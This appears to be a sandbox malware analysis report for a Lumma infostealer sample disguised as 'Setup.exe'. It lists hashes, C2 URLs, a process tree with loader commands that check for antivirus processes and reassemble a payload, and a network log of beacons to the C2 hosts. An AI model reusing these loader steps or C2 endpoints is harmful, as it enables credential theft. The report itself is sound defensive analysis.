Analysis

  • max time kernel
    39s
  • max time network
    36s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    02/01/2025, 04:20 UTC

General

  • Target

    Setup.exe

  • Size

    800.0MB

  • MD5

    b4d4d19863fd8b7b64e2e8a1204aac62

  • SHA1

    64d1609b82e6054af14412a92724d8605b7d015d

  • SHA256

    56375ce34ece830c6770d768f1ed501a78c359a380c9576274dbbd19c9ef5aa3

  • SHA512

    e00fa8b5af32b334849e499f5f0be5a23aeb37ab2b28d2bf82cee2766d85c3fb1a874cd327467ebdd57475b2b42befb7507d2d6ac923020964e23f0a3f5a7bff

  • SSDEEP

    24576:KjatNrAGDrHrmxAztbD6Lf5aytZI9FmLaQWnnZp/fh+AR9wLsS9qB3Hcxx1VmLHA:PUGnHRbEau4FmUZpYARuISsV+VmLHRQl

Score
10/10

Malware Config

Extracted

  • Family
    lumma
  • C2
    https://cloudewahsj.shop/api
    https://rabidcowse.shop/api
    https://noisycuttej.shop/api
    https://tirepublicerj.shop/api
    https://framekgirus.shop/api
    https://wholersorie.shop/api
    https://abruptyopsn.shop/api
    https://nearycrepso.shop/api

Extracted

  • Family
    lumma
  • C2
    https://abruptyopsn.shop/api
    https://wholersorie.shop/api
    https://framekgirus.shop/api
    https://tirepublicerj.shop/api
    https://noisycuttej.shop/api
    https://rabidcowse.shop/api
    https://cloudewahsj.shop/api

Signatures

  • Lumma Stealer, LummaC
    Lumma or LummaC is an infostealer written in C++, first seen in August 2022.
  • Lumma family
  • Checks computer location settings (2 TTPs, 2 IoCs)
    Looks up the country code configured in the registry, likely a geofence.
  • Executes dropped EXE (2 IoCs)
  • Enumerates processes with tasklist (1 TTP, 4 IoCs)
  • Drops file in Windows directory (4 IoCs)
  • Enumerates physical storage devices (1 TTP)
    Attempts to interact with connected storage/optical drive(s).
  • System Location Discovery: System Language Discovery (1 TTP, 25 IoCs)
    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  • Suspicious behavior: EnumeratesProcesses (12 IoCs)
  • Suspicious use of AdjustPrivilegeToken (4 IoCs)
  • Suspicious use of FindShellTrayWindow (6 IoCs)
  • Suspicious use of SendNotifyMessage (6 IoCs)
  • Suspicious use of WriteProcessMemory (64 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c move Elderly Elderly.cmd & Elderly.cmd
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2840
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\SysWOW64\findstr.exe
        findstr /I "opssvc wrsa"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2344
      • C:\Windows\SysWOW64\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:1452
      • C:\Windows\SysWOW64\findstr.exe
        findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4092
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c md 833075
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3040
      • C:\Windows\SysWOW64\extrac32.exe
        extrac32 /Y /E Knights
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2348
      • C:\Windows\SysWOW64\findstr.exe
        findstr /V "COMMUNITIES" Expiration
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3232
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b 833075\Auditor.com + Teacher + Belkin + Streams + Urls + Reunion + Le + Auctions + Suburban + Lotus + Cio 833075\Auditor.com
        3⤵
        • System Location Discovery: System Language Discovery
        PID:5080
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c copy /b ..\Die + ..\Folding + ..\Compete + ..\Bukkake + ..\Newer + ..\Common + ..\Relying c
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3944
      • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\833075\Auditor.com
        Auditor.com c
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:936
      • C:\Windows\SysWOW64\choice.exe
        choice /d y /t 5
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2972
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
      PID:2608
    • C:\Users\Admin\AppData\Local\Temp\Setup.exe
      "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
      1⤵
      • Checks computer location settings
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1484
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c move Elderly Elderly.cmd & Elderly.cmd
        2⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2988
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:3940
        • C:\Windows\SysWOW64\findstr.exe
          findstr /I "opssvc wrsa"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4004
        • C:\Windows\SysWOW64\tasklist.exe
          tasklist
          3⤵
          • Enumerates processes with tasklist
          • System Location Discovery: System Language Discovery
          • Suspicious use of AdjustPrivilegeToken
          PID:2372
        • C:\Windows\SysWOW64\findstr.exe
          findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1308
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c md 833075
          3⤵
          • System Location Discovery: System Language Discovery
          PID:3836
        • C:\Windows\SysWOW64\extrac32.exe
          extrac32 /Y /E Knights
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1808
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c copy /b 833075\Auditor.com + Teacher + Belkin + Streams + Urls + Reunion + Le + Auctions + Suburban + Lotus + Cio 833075\Auditor.com
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2064
        • C:\Windows\SysWOW64\cmd.exe
          cmd /c copy /b ..\Die + ..\Folding + ..\Compete + ..\Bukkake + ..\Newer + ..\Common + ..\Relying c
          3⤵
          • System Location Discovery: System Language Discovery
          PID:4100
        • C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\833075\Auditor.com
          Auditor.com c
          3⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of SendNotifyMessage
          PID:1736
        • C:\Windows\SysWOW64\choice.exe
          choice /d y /t 5
          3⤵
          • System Location Discovery: System Language Discovery
          PID:904

Network

    • flag-us
      DNS
      8.8.8.8.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      8.8.8.8.in-addr.arpa
      IN PTR
      Response
      8.8.8.8.in-addr.arpa
      IN PTR
      dns.google
    • flag-us
      DNS
      209.205.72.20.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      209.205.72.20.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      172.210.232.199.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      172.210.232.199.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      133.32.126.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      133.32.126.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      95.221.229.192.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      95.221.229.192.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      imsxHtkofZmzDdFO.imsxHtkofZmzDdFO
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      imsxHtkofZmzDdFO.imsxHtkofZmzDdFO
      IN A
      Response
    • flag-us
      DNS
      228.249.119.40.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      228.249.119.40.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      throwupset.click
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      throwupset.click
      IN A
      Response
      throwupset.click
      IN A
      104.21.80.1
      throwupset.click
      IN A
      104.21.32.1
      throwupset.click
      IN A
      104.21.16.1
      throwupset.click
      IN A
      104.21.48.1
      throwupset.click
      IN A
      104.21.112.1
      throwupset.click
      IN A
      104.21.64.1
      throwupset.click
      IN A
      104.21.96.1
    • flag-us
      POST
      https://throwupset.click/api
      Auditor.com
      Remote address:
      104.21.80.1:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: throwupset.click
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:11 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=0733gvdmjtsrqcvf2k08o0pgah; expires=Sun, 27 Apr 2025 22:09:50 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U8bb%2BdVibBzSrf8JtJt7GHzrVuddaKBZfStsp6%2Bji2CuSiwjM3FHwQy5CWs2j4REamM0OV%2B93ALOMiLcn2KV2GJnsIjQEfgflJh2VOHK9t%2BSf3CnjtBde4zwFfY%2F2YVnqrVJ"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8e7be773da0-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=29621&min_rtt=25532&rtt_var=12217&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3507&recv_bytes=605&delivery_rate=105619&cwnd=253&unsent_bytes=0&cid=7c9efb0b2523250c&ts=258&x=0"
    • flag-us
      DNS
      nearycrepso.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      nearycrepso.shop
      IN A
      Response
    • flag-us
      DNS
      abruptyopsn.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      abruptyopsn.shop
      IN A
      Response
      abruptyopsn.shop
      IN A
      104.21.80.1
      abruptyopsn.shop
      IN A
      104.21.64.1
      abruptyopsn.shop
      IN A
      104.21.48.1
      abruptyopsn.shop
      IN A
      104.21.32.1
      abruptyopsn.shop
      IN A
      104.21.16.1
      abruptyopsn.shop
      IN A
      104.21.112.1
      abruptyopsn.shop
      IN A
      104.21.96.1
    • flag-us
      DNS
      197.87.175.4.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      197.87.175.4.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      15.164.165.52.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      15.164.165.52.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      1.80.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.80.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      134.130.81.91.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      134.130.81.91.in-addr.arpa
      IN PTR
      Response
    • flag-us
      POST
      https://abruptyopsn.shop/api
      Auditor.com
      Remote address:
      104.21.80.1:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: abruptyopsn.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:11 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=6r5kjr49uhcm546iv4f8ocm2o0; expires=Sun, 27 Apr 2025 22:09:50 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BJE%2BzlTEoONZj0NtfoHvLebJ%2F5XR3VqUKFzrCuoX2RylIdaZJc9Kkhn10O7dJwl%2F4L4qmvVnTBJ9MhmcPLCAmtka93I%2BjmM5CXEOwvbSluJ1X7h4aPAppspJvxn7F13J%2BzuD"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8e9ef4cf650-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=26752&min_rtt=25896&rtt_var=6642&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3509&recv_bytes=605&delivery_rate=131360&cwnd=253&unsent_bytes=0&cid=dc86930329c294ab&ts=200&x=0"
    • flag-us
      DNS
      wholersorie.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      wholersorie.shop
      IN A
      Response
      wholersorie.shop
      IN A
      104.21.41.51
      wholersorie.shop
      IN A
      172.67.160.114
    • flag-us
      POST
      https://wholersorie.shop/api
      Auditor.com
      Remote address:
      104.21.41.51:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: wholersorie.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:12 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=dke4hnm8vjekfk45isujkpdi2p; expires=Sun, 27 Apr 2025 22:09:51 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=urZA5R2UBSreBucHFl2kokwzvp2fFGY%2BcQLL0UPv%2BP2k0VIn2I7TMW1o7nzsbPOaZT%2B%2FVGPDpDE7rDKisrR00DMwDlHoaWJA2xU59M1CZwiiouhG5kGs32MXEytCn5Uw7Bzw"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8ebcd08ed03-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=27582&min_rtt=26515&rtt_var=7102&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3298&recv_bytes=605&delivery_rate=130610&cwnd=234&unsent_bytes=0&cid=bbdd1fb3e323961f&ts=242&x=0"
    • flag-us
      DNS
      framekgirus.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      framekgirus.shop
      IN A
      Response
      framekgirus.shop
      IN A
      172.67.179.160
      framekgirus.shop
      IN A
      104.21.18.19
    • flag-us
      POST
      https://framekgirus.shop/api
      Auditor.com
      Remote address:
      172.67.179.160:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: framekgirus.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:12 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=hlur5kspfbc2acmu027v2jv27j; expires=Sun, 27 Apr 2025 22:09:51 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z4eEPdadOJGKIXoDe9RGsVRJ6CELr2i6NXFzZ8kg42rxvKLcch0KzpzMM13QX7pENFYmsyywxERB%2BZSuN80kjGQFk4Wri3ed0HnnHZCtijX1EOjb2shO4mRvreT%2BpWl37hZ7"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8edd81a942b-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=26751&min_rtt=26090&rtt_var=6545&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=605&delivery_rate=134112&cwnd=253&unsent_bytes=0&cid=3dab07fd1d8ab95d&ts=229&x=0"
    • flag-us
      DNS
      tirepublicerj.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      tirepublicerj.shop
      IN A
      Response
      tirepublicerj.shop
      IN A
      104.21.32.1
      tirepublicerj.shop
      IN A
      104.21.112.1
      tirepublicerj.shop
      IN A
      104.21.16.1
      tirepublicerj.shop
      IN A
      104.21.48.1
      tirepublicerj.shop
      IN A
      104.21.64.1
      tirepublicerj.shop
      IN A
      104.21.96.1
      tirepublicerj.shop
      IN A
      104.21.80.1
    • flag-us
      POST
      https://tirepublicerj.shop/api
      Auditor.com
      Remote address:
      104.21.32.1:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: tirepublicerj.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:12 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=le12e9e4ovjlmdvcetrbl3o4gr; expires=Sun, 27 Apr 2025 22:09:51 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZatVysE4Ab%2F2yMFg3zG2Ewd9bTQzxWQE1wOQzgtAub2gqddpD0rADX5AlPiZCwWYT7JXBDYLjJONd1M%2BQpSel0bQnyk%2BpEvsOcS6FpONbvFsR9h3cR%2FpsiNPSdopxfaytDo6ARQ%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8efcf2cef44-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=28476&min_rtt=26059&rtt_var=7277&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3301&recv_bytes=609&delivery_rate=134352&cwnd=244&unsent_bytes=0&cid=3a02a8543c11f76f&ts=222&x=0"
    • flag-us
      DNS
      51.41.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      51.41.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      160.179.67.172.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      160.179.67.172.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      noisycuttej.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      noisycuttej.shop
      IN A
      Response
      noisycuttej.shop
      IN A
      104.21.71.146
      noisycuttej.shop
      IN A
      172.67.170.178
    • flag-us
      POST
      https://noisycuttej.shop/api
      Auditor.com
      Remote address:
      104.21.71.146:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: noisycuttej.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:13 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=7e2igtp4vfo222p69cso5joi8a; expires=Sun, 27 Apr 2025 22:09:52 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=g%2B%2B%2FPEnTc5ofEe01%2F8%2BORRh4XkIiuwDnYqnDjHLBtmAjA0iqn8phvDVc94CBta6G%2FklML6EbRPx9QQKQcYPIWtBrt64gCt5SqthzNfqjyDZ0eZewshOxEG60D6uwM71bkbW%2B"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8f1bc9741a0-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=26820&min_rtt=26248&rtt_var=6435&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3300&recv_bytes=605&delivery_rate=136103&cwnd=253&unsent_bytes=0&cid=529b4bdc6eb24ca8&ts=235&x=0"
    • flag-us
      DNS
      rabidcowse.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      rabidcowse.shop
      IN A
      Response
      rabidcowse.shop
      IN A
      104.21.7.224
      rabidcowse.shop
      IN A
      172.67.156.127
    • flag-us
      POST
      https://rabidcowse.shop/api
      Auditor.com
      Remote address:
      104.21.7.224:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: rabidcowse.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:13 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=nijdr8l2kb4r78863lj233jo2k; expires=Sun, 27 Apr 2025 22:09:52 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R2nbUwfRgqb7I5QGXqQRWl%2Bvz41iV6u5dR31AKUUlZcSl7AH9KNJ86nFiVHYBwYD8WfZGVHcYnh9V42M%2BZ8KpzJSpi1HprlPoSc4mrimHHfniXTrmd7pTvzxzkIwRWcbq74%3D"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8f3b8a7ef21-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=26634&min_rtt=26130&rtt_var=6200&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3294&recv_bytes=603&delivery_rate=139709&cwnd=253&unsent_bytes=0&cid=e5126bc234ce4dc3&ts=223&x=0"
    • flag-us
      DNS
      cloudewahsj.shop
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      cloudewahsj.shop
      IN A
      Response
      cloudewahsj.shop
      IN A
      104.21.112.1
      cloudewahsj.shop
      IN A
      104.21.32.1
      cloudewahsj.shop
      IN A
      104.21.16.1
      cloudewahsj.shop
      IN A
      104.21.80.1
      cloudewahsj.shop
      IN A
      104.21.96.1
      cloudewahsj.shop
      IN A
      104.21.64.1
      cloudewahsj.shop
      IN A
      104.21.48.1
    • flag-us
      POST
      https://cloudewahsj.shop/api
      Auditor.com
      Remote address:
      104.21.112.1:443
      Request
      POST /api HTTP/1.1
      Connection: Keep-Alive
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Content-Length: 8
      Host: cloudewahsj.shop
      Response
      HTTP/1.1 200 OK
      Date: Thu, 02 Jan 2025 04:23:13 GMT
      Content-Type: text/html; charset=UTF-8
      Transfer-Encoding: chunked
      Connection: keep-alive
      Set-Cookie: PHPSESSID=0psca6cps3a046k54jg5bjepuc; expires=Sun, 27 Apr 2025 22:09:52 GMT; Max-Age=9999999; path=/
      Expires: Thu, 19 Nov 1981 08:52:00 GMT
      Cache-Control: no-store, no-cache, must-revalidate
      Pragma: no-cache
      X-Frame-Options: DENY
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
      cf-cache-status: DYNAMIC
      vary: accept-encoding
      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=a1%2FN4bcQwdZftIvRYCPXg6sLIzS2TGWLhZ6%2FifraDPFkWG6xi8GVAZgXWUAPIhHwTN9O6gAxThJDP0mA3gagxmMKMGlttlAwjz0r%2BREwL%2BBG6ZRcn029Ik1ZvuH5JGg7K7cK"}],"group":"cf-nel","max_age":604800}
      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
      Server: cloudflare
      CF-RAY: 8fb7f8f5bec1ecfd-LHR
      alt-svc: h3=":443"; ma=86400
      server-timing: cfL4;desc="?proto=TCP&rtt=26897&min_rtt=26294&rtt_var=6507&sent=6&recv=7&lost=0&retrans=0&sent_bytes=3293&recv_bytes=605&delivery_rate=135276&cwnd=253&unsent_bytes=0&cid=b094e36699658fc5&ts=217&x=0"
    • flag-us
      DNS
      1.32.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      1.32.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      146.71.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      146.71.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      224.7.21.104.in-addr.arpa
      Remote address:
      8.8.8.8:53
      Request
      224.7.21.104.in-addr.arpa
      IN PTR
      Response
    • flag-us
      DNS
      steamcommunity.com
      Auditor.com
      Remote address:
      8.8.8.8:53
      Request
      steamcommunity.com
      IN A
      Response
      steamcommunity.com
      IN A
      23.214.143.155
    • flag-gb
      GET
      https://steamcommunity.com/profiles/76561199724331900
      Auditor.com
      Remote address:
      23.214.143.155:443
      Request
      GET /profiles/76561199724331900 HTTP/1.1
      Connection: Keep-Alive
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
      Host: steamcommunity.com
      Response
      HTTP/1.1 200 OK
      Server: nginx
      Content-Type: text/html; charset=UTF-8
